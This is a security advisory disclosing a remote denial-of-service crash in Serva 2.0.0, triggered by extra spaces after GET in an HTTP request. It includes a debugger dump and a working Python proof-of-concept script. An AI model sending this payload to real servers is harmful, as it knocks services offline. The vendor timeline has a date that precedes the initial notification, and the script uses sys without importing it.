Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product:        Serva
Vendor URL:     www.vercot.com
Type:           Uncaught Exception [CWE-248]
Date found:     2012-12-07
Date published: 2013-01-14
CVSSv2 Score:   5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE:            -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.

The application uses a space delimiter to parse a GET Request. Adding
more than one space (\x20) behind the GET will cause the application to
crash with an unhandled c++ exception.

(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0         nv up ei pl nz na
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e              pop     esi


5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
import socket

target="192.168.0.21"
port=80

# 0000   47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d  GET  / HTTP/1.1.
# 0010   0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39  .Host: http://19
# 0020   32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74  2.168.0.21..Cont
# 0030   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d  ent-Length: 0...
# 0040   0a                                               .

payload = (
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!\n"
s.close()


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure


8. REFERENCES
-------------
http://security.inshell.net/advisory/34